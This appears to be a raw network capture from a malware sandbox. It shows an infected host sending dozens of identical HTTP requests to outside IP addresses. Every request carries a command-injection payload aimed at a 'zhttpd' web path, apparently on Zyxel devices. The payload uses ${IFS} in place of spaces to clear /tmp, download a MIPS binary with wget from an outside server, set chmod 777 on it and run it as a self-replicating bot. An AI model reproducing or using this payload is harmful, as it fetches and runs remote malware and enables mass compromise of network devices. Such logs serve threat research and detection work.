                                    Jan 13, 2024 19:02:50.554500103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8447192.168.2.1350912203.165.41.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554558039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8448192.168.2.1339164187.226.7.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554589033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8449192.168.2.1336954150.9.33.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554661989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8450192.168.2.1356288153.88.216.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554696083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8451192.168.2.1360118154.157.250.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554723024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8452192.168.2.1348838202.173.2.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554759979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8453192.168.2.1354174162.13.151.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554836988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8454192.168.2.1343910192.72.28.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554869890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8455192.168.2.1355106132.212.196.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554924011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8456192.168.2.1357178223.81.169.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554972887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8457192.168.2.1332870178.35.7.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555017948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8458192.168.2.1340232129.104.30.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555067062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8459192.168.2.1352642115.124.183.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555109024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8460192.168.2.135366047.219.50.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555164099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8461192.168.2.1355862176.205.169.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555202961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8462192.168.2.1334760196.56.52.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555243969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8463192.168.2.1351900198.180.102.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555286884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8464192.168.2.1360878209.1.194.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555356979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8465192.168.2.1344104139.87.127.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555404902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8466192.168.2.1355040177.226.246.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555433035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8467192.168.2.133560819.209.78.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555500984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8468192.168.2.1360818102.119.120.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555531979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8469192.168.2.1342652148.248.111.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555560112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8470192.168.2.1344122124.37.162.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555599928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8471192.168.2.135125485.173.182.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555639982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8472192.168.2.133791240.245.38.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555691957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8473192.168.2.1345300117.180.28.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555772066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8474192.168.2.134948052.68.94.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555819988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8475192.168.2.135848468.155.63.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555855989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8476192.168.2.1349470125.105.78.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555927992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8477192.168.2.135291650.97.166.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.555983067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8478192.168.2.134976232.148.173.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556008101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8479192.168.2.1334306150.20.92.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556071043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8480192.168.2.135174494.79.36.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556097031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8481192.168.2.134399436.23.229.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556128025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8482192.168.2.1346434141.133.221.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556178093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8483192.168.2.135926857.88.188.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556221962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8484192.168.2.13357841.227.110.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556281090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8485192.168.2.1338160189.111.121.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556328058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8486192.168.2.1353902135.11.23.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556421041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8487192.168.2.135630818.102.20.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556448936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8488192.168.2.134575650.82.101.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556518078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8489192.168.2.1350164197.190.117.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556564093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8490192.168.2.134861681.161.202.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556603909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8491192.168.2.1353580222.195.65.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556679010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8492192.168.2.1335698205.92.90.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556700945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8493192.168.2.1340596199.166.224.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556747913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8494192.168.2.1358290104.83.173.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556808949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8495192.168.2.133725438.64.79.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556874990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8496192.168.2.1350182180.237.206.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556932926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8497192.168.2.133613413.150.52.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.556978941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8498192.168.2.1353986202.147.232.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557014942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8499192.168.2.1347342175.240.101.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557075024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8500192.168.2.133509689.53.147.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557131052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8501192.168.2.1345582129.112.84.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557173967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8502192.168.2.1343818134.125.111.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557215929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8503192.168.2.1358356116.140.84.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557318926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8504192.168.2.1348602219.177.91.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557327032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8505192.168.2.134830053.143.110.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557375908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8506192.168.2.1353238172.168.58.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557410955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8507192.168.2.134119279.196.175.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557497025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8508192.168.2.1349756196.93.132.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.557534933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8509192.168.2.1352524112.70.159.194443
                                    TimestampBytes transferredDirectionData
